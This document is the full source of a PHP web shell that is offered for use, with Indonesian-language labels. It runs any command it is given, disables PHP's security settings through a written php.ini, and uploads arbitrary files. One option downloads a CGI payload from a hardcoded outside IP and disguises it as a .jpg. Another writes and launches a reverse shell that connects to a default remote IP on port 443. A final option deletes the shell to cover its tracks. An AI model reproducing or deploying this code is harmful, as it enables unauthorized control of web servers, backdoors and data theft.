simple sheel deb

1. <?php
2. /*------- Simpel Shell---------- */
3. /*------ Coded by d3b~X -------- */
4. error_reporting(0);
5. function Execute($in) {
6.     $out = '';
7.     if (function_exists('system')) {
8.         @system($in,$out);
9.         $out = @join("\n",$out);
10.     } elseif (function_exists('passthru')) {
11.         ob_start();
12.         @passthru($in);
13.         $out = ob_get_clean();
14.     } elseif (function_exists('exec')) {
15.         ob_start();
16.         @exec($in);
17.         $out = ob_get_clean();
18.     } elseif (function_exists('shell_exec')) {
19.         $out = shell_exec($in);
20.     } elseif (is_resource($f = @popen($in,"r"))) {
21.         $out = "";
22.         while(!@feof($f))
23.             $out .= fread($f,1024);
24.         pclose($f);
25.     }
26.     return $out;
27. }
28.  
29. if(@ini_get("disable_functions")){
30.  echo "DisablePHP=".@ini_get("disable_functions");
31. }else{
32.  echo "Disable PHP = None";
33.  echo "<br>";echo " Kernel = ";echo Execute("uname -a");echo "<br>";
34. echo Execute("id");}echo "<br>";print "\n";
35. if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";}
36. echo "<br>";print "\n";
37. echo " Curl Support = ";echo Execute("which curl"); echo "<br>";print "\n";
38. echo getcwd();
39. echo "<br><br>[ <a href='?konek' >./BEKKONEK</a> ] | [ <a href='?disc' >./DIS FUNC</a> ] |
40. [ <a href='?command' >./EXEC</a> ] | [ <a href='?cgishell' >./CGI SHELL</a> ] |
41. [ <a href='?upp' >./UPLOAD</a> ] | [ <a href='?hapus' >./KILL ME</a> ]<br><br>";
42.  
43. if(isset($_GET["cgishell"])){
44. $path = getcwd();
45. $file = '
46. Options FollowSymLinks MultiViews Indexes ExecCGI
47. AddType application/x-httpd-cgi .jpg
48. AddHandler cgi-script .jpg
49. AddHandler cgi-script .jpg
50. ';
51. mkdir("cgi", 0755);
52. $b = fopen($path.'/cgi/.htaccess', 'w');
53. fwrite($b,$file);
54. fclose($b);
55. $file = file_get_contents('http://64.34.111.182/cgi.txt');
56. $b = fopen($path.'/cgi/ganteng.jpg', 'w');
57. fwrite($b,$file);
58. fclose($b);
59. chmod($path.'/cgi/ganteng.jpg', 0755);
60. echo"<br><a href='cgi/ganteng.jpg' target='_blank'>SHELL</a><br>";
61. echo"Password = d3b";
62. }
63.  
64. if(isset($_GET["disc"])){
65. $path = getcwd();
66. $content = '
67. safe_mode = off
68. disable_functions = NONE
69. ';
70. $fff = fopen($path.'/php.ini', 'w'); fwrite($fff, $content); fclose($fff);
71. echo"<a href='php.ini' target='_blank'>[ DisFunct]</a><br></center>";
72. }
73. if(isset($_GET["upp"])){
74. echo"<form method=post enctype=multipart/form-data>";
75. echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
76. if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
77. echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
78. }else{
79. echo"<b>gagal";}}
80. }
81. if(isset($_GET["hapus"])){
82. if(file_exists("kon.php")) unlink("kon.php");
83. unlink(__FILE__);
84. echo "Bye";
85. }
86. if(isset($_GET["konek"])){
87. echo <<<PEE
88. <form method='POST'>
89. <input size='20' value='162.243.77.30' name='ip' type='text'> : IP<br>
90. <input size='20' value='443' name='port' type='text'> : PORT
91. <br>
92. <input value='konek' name='' type='submit'><br><br>
93. </form>
94. PEE;
95. if($_POST){
96. $ipx = $_POST['ip'];
97. $portx = $_POST['port'];
98. $path = getcwd();
99. $lol = '<?php set_time_limit (0); $ip = "'.$ipx.'"; $port = '.$portx.'; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/sh -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cant fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cant setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("'.$path.'/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cant spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>';
100. $fff = fopen($path.'/kon.php', 'w'); fwrite($fff, $lol); fclose($fff);
101. echo "[ <a href='kon.php' target='_blank'>./GO</a> ]";
102. }
103. }
104. if(isset($_GET["command"])){
105. echo <<<PEE
106.   <form method='POST'>
107.   <input size='100' value='' name='comma' type='text'><br>
108.   <input value=' Exec Command ' name='' type='submit'><br><br>
109.   </form>
110. PEE;
111. if($_POST){
112.  $comm = $_POST['comma'];
113.  echo '<textarea rows="20" cols="100">';
114.  echo nl2br(Execute($comm));
115.  echo '</textarea>';
116. }
117. }
118. ?>